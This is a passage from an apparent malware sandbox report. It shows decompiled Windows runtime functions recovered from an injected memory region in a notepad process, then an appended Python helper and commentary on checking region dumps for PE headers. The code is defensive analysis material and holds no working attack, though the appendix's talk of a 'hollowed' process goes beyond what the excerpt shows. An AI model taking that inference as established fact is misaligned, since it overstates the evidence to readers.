                                                    									if(__eflags == 0) {
                                                    										E00B9217A(_t71, __eflags, _t85);
                                                    									}
                                                    								}
                                                    							}
                                                    							_push("RTL: Re-Waiting\n");
                                                    							_push(0);
                                                    							_push(0x65);
                                                    							_a8 = _a4;
                                                    							L00B63F92();
                                                    							_t91 = _t93 + 0xc;
                                                    							__eflags =  *0x7ffe0382;
                                                    							if( *0x7ffe0382 != 0) {
                                                    								goto L21;
                                                    							}
                                                    						}
                                                    						goto L36;
                                                    					}
                                                    				} else {
                                                    					return _t40;
                                                    				}
                                                    				L36:
			}

                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00B724FA
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B724BD
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B7248D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 12f5432bf507a20e32cf6d2ccb72dff9d745d6e5e89f9b07062a929745b320e2
                                                    • Instruction ID: d6663d04c42e53fe485d69d0919334b8748fd4230e6c5ac207289c2c773b264c
                                                    • Opcode Fuzzy Hash: 12f5432bf507a20e32cf6d2ccb72dff9d745d6e5e89f9b07062a929745b320e2
                                                    • Instruction Fuzzy Hash: 7B41C4B0A04204AFDB20DB68CC85FAA77E8EF44720F20C6D6F6699B3D1D774E9418760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00B4FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _t105;
                                                    				void* _t110;
                                                    				char _t114;
                                                    				short _t115;
                                                    				void* _t118;
                                                    				signed short* _t119;
                                                    				short _t120;
                                                    				char _t122;
                                                    				void* _t127;
                                                    				void* _t130;
                                                    				signed int _t136;
                                                    				intOrPtr _t143;
                                                    				signed int _t158;
                                                    				signed short* _t164;
                                                    				signed int _t167;
                                                    				void* _t170;
                                                    
                                                    				_t158 = 0;
                                                    				_t164 = _a4;
                                                    				_v20 = 0;
                                                    				_v24 = 0;
                                                    				_v8 = 0;
                                                    				_v12 = 0;
                                                    				_v16 = 0;
                                                    				_v28 = 0;
                                                    				_t136 = 0;
                                                    				while(1) {
                                                    					_t167 =  *_t164 & 0x0000ffff;
                                                    					if(_t167 == _t158) {
                                                    						break;
                                                    					}
                                                    					_t118 = _v20 - _t158;
                                                    					if(_t118 == 0) {
                                                    						if(_t167 == 0x3a) {
                                                    							if(_v12 > _t158 || _v8 > _t158) {
                                                    								break;
                                                    							} else {
                                                    								_t119 =  &(_t164[1]);
                                                    								if( *_t119 != _t167) {
                                                    									break;
                                                    								}
                                                    								_t143 = 2;
                                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                    								_v28 = 1;
                                                    								_v8 = _t143;
                                                    								_t136 = _t136 + 1;
                                                    								L47:
                                                    								_t164 = _t119;
                                                    								_v20 = _t143;
                                                    								L14:
                                                    								if(_v24 == _t158) {
                                                    									L19:
                                                    									_t164 =  &(_t164[1]);
                                                    									_t158 = 0;
                                                    									continue;
                                                    								}
                                                    								if(_v12 == _t158) {
                                                    									if(_v16 > 4) {
                                                    										L29:
                                                    										return 0xc000000d;
                                                    									}
                                                    									_t120 = L00B4EE02(_v24, _t158, 0x10);
                                                    									_t170 = _t170 + 0xc;
                                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                    									_t136 = _t136 + 1;
                                                    									goto L19;
                                                    								}
                                                    								if(_v16 > 3) {
                                                    									goto L29;
                                                    								}
                                                    								_t122 = L00B4EE02(_v24, _t158, 0xa);
                                                    								_t170 = _t170 + 0xc;
                                                    								if(_t122 > 0xff) {
                                                    									goto L29;
                                                    								}
                                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                    								goto L19;
                                                    							}
                                                    						}
                                                    						L21:
                                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                                    							break;
                                                    						} else {
                                                    							if(E00B4685D(_t167, 4) == 0) {
                                                    								if(E00B4685D(_t167, 0x80) != 0) {
                                                    									if(_v12 > 0) {
                                                    										break;
                                                    									}
                                                    									_t127 = 1;
                                                    									_a7 = 1;
                                                    									_v24 = _t164;
                                                    									_v20 = 1;
                                                    									_v16 = 1;
                                                    									L36:
                                                    									if(_v20 == _t127) {
                                                    										goto L19;
                                                    									}
                                                    									_t158 = 0;
                                                    									goto L14;
                                                    								}
                                                    								break;
                                                    							}
                                                    							_a7 = 0;
                                                    							_v24 = _t164;
                                                    							_v20 = 1;
                                                    							_v16 = 1;
                                                    							goto L19;
                                                    						}
                                                    					}
                                                    					_t130 = _t118 - 1;
                                                    					if(_t130 != 0) {
                                                    						if(_t130 == 1) {
                                                    							goto L21;
                                                    						}
                                                    						_t127 = 1;
                                                    						goto L36;
                                                    					}
                                                    					if(_t167 >= 0x80) {
                                                    						L7:
                                                    						if(_t167 == 0x3a) {
                                                    							_t158 = 0;
                                                    							if(_v12 > 0 || _v8 > 6) {
                                                    								break;
                                                    							} else {
                                                    								_t119 =  &(_t164[1]);
                                                    								if( *_t119 != _t167) {
                                                    									_v8 = _v8 + 1;
                                                    									L13:
                                                    									_v20 = _t158;
                                                    									goto L14;
                                                    								}
                                                    								if(_v28 != 0) {
                                                    									break;
                                                    								}
                                                    								_v28 = _v8 + 1;
                                                    								_t143 = 2;
                                                    								_v8 = _v8 + _t143;
                                                    								goto L47;
                                                    							}
                                                    						}
                                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                    							break;
                                                    						} else {
                                                    							_v12 = _v12 + 1;
                                                    							_t158 = 0;
                                                    							goto L13;
                                                    						}
                                                    					}
                                                    					if(E00B4685D(_t167, 4) != 0) {
                                                    						_v16 = _v16 + 1;
                                                    						goto L19;
                                                    					}
                                                    					if(E00B4685D(_t167, 0x80) != 0) {
                                                    						_v16 = _v16 + 1;
                                                    						if(_v12 > 0) {
                                                    							break;
                                                    						}
                                                    						_a7 = 1;
                                                    						goto L19;
                                                    					}
                                                    					goto L7;
                                                    				}
                                                    				 *_a8 = _t164;
                                                    				if(_v12 != 0) {
                                                    					if(_v12 != 3) {
                                                    						goto L29;
                                                    					}
                                                    					_v8 = _v8 + 1;
                                                    				}
                                                    				if(_v28 != 0 || _v8 == 7) {
                                                    					if(_v20 != 1) {
                                                    						if(_v20 != 2) {
                                                    							goto L29;
                                                    						}
                                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                    						L65:
                                                    						_t105 = _v28;
                                                    						if(_t105 != 0) {
                                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                                    							E00B28980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                    							_t110 = 8;
                                                    							L00B1DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                    						}
                                                    						return 0;
                                                    					}
                                                    					if(_v12 != 0) {
                                                    						if(_v16 > 3) {
                                                    							goto L29;
                                                    						}
                                                    						_t114 = L00B4EE02(_v24, 0, 0xa);
                                                    						_t170 = _t170 + 0xc;
                                                    						if(_t114 > 0xff) {
                                                    							goto L29;
                                                    						}
                                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                    						goto L65;
                                                    					}
                                                    					if(_v16 > 4) {
                                                    						goto L29;
                                                    					}
                                                    					_t115 = L00B4EE02(_v24, 0, 0x10);
                                                    					_t170 = _t170 + 0xc;
                                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                    					goto L65;
                                                    				} else {
                                                    					goto L29;
                                                    				}
                                                    			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID:
                                                    • API String ID: 3965848254-0
                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction ID: a8a908d9a1f61f5f9861473c760c07d303624ebc9d954418bb3b4da16572f8f9
                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction Fuzzy Hash: 24916C31D0021AAEDB24CF69C8456BEB7F4EF59305F2480FAD425A7162E7309B41AB91
                                                    Uniqueness
                                                    • Uniqueness Score: -1.00%
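The dump metadata above records that the region at 0x00AF0000 in the hollowed notepad process is "based on PE: true", i.e. the dumped memory starts with a valid MZ/PE image header, which is what lets the report treat an injected region as a module and resolve its image base. The following is an added example, not Joe Sandbox's own implementation, of the check an analyst would run over a raw region dump to confirm that: validate the MZ header, follow e_lfanew to the PE signature, and read ImageBase from the optional header. The sample region bytes, the base addresses and the function names are constructed for illustration.

```python
import struct
from typing import List, Optional, Tuple

MZ_MAGIC = b"MZ"
PE_MAGIC = b"PE\0\0"


def is_pe_based(region: bytes) -> bool:
    """True if the region starts with a well-formed MZ header whose e_lfanew
    points to a PE\\0\\0 signature that lies inside the region."""
    if len(region) < 0x40 or region[:2] != MZ_MAGIC:
        return False
    e_lfanew = struct.unpack_from("<I", region, 0x3C)[0]
    if e_lfanew + 4 > len(region):          # pointer outside the dump: not trustworthy
        return False
    return region[e_lfanew:e_lfanew + 4] == PE_MAGIC


def pe_image_base(region: bytes) -> Optional[int]:
    """Read ImageBase from the optional header (PE32 or PE32+); None if not a PE."""
    if not is_pe_based(region):
        return None
    e_lfanew = struct.unpack_from("<I", region, 0x3C)[0]
    opt = e_lfanew + 4 + 20                  # PE signature + IMAGE_FILE_HEADER (20 bytes)
    if opt + 2 > len(region):
        return None
    magic = struct.unpack_from("<H", region, opt)[0]
    if magic == 0x10B:                       # PE32: ImageBase is 4 bytes at optional header offset 28
        off, fmt = opt + 28, "<I"
    elif magic == 0x20B:                     # PE32+: ImageBase is 8 bytes at optional header offset 24
        off, fmt = opt + 24, "<Q"
    else:
        return None
    if off + struct.calcsize(fmt) > len(region):
        return None
    return struct.unpack_from(fmt, region, off)[0]


def build_pe32_stub(image_base: int, e_lfanew: int = 0x80) -> bytes:
    """Constructed sample region: MZ header, padding, PE signature, file header and a
    minimal PE32 optional header. Not a real binary; only the fields read above are set."""
    buf = bytearray(e_lfanew + 4 + 20 + 96)
    buf[0:2] = MZ_MAGIC
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = PE_MAGIC
    opt = e_lfanew + 24
    struct.pack_into("<H", buf, opt, 0x10B)           # PE32 magic
    struct.pack_into("<I", buf, opt + 28, image_base)  # ImageBase
    return bytes(buf)


def classify_regions(regions: List[Tuple[int, bytes]]) -> List[Tuple[int, bool, Optional[int]]]:
    """For each (dump base, bytes) return (base, based_on_pe, image_base), mirroring the
    report's 'based on PE' flag and 'Offset' field."""
    return [(base, is_pe_based(data), pe_image_base(data)) for base, data in regions]


# Constructed sample input: one region that carries an injected image header at 0x00AF0000
# (the base the report resolves for the hollowed notepad process) and one plain RWX region.
SAMPLE_REGIONS: List[Tuple[int, bytes]] = [
    (0x00AF0000, build_pe32_stub(0x00AF0000)),
    (0x00BE0000, b"\x00" * 0x100),
]


def demo() -> List[Tuple[int, bool, Optional[int]]]:
    return classify_regions(SAMPLE_REGIONS)


if __name__ == "__main__":
    for base, pe, image_base in demo():
        print(f"region {base:#010x}: based on PE: {pe}, image base: {image_base}")
```

Applied to real sdmp files, the first region whose header validates gives the image base to rebase the other dumps against; a region flagged "based on PE: false" (heap, stack or unpacked shellcode) is better handled by a byte-pattern or string scan than by a PE parser, and an e_lfanew that points past the end of the dump is a common sign of a partial or deliberately damaged header.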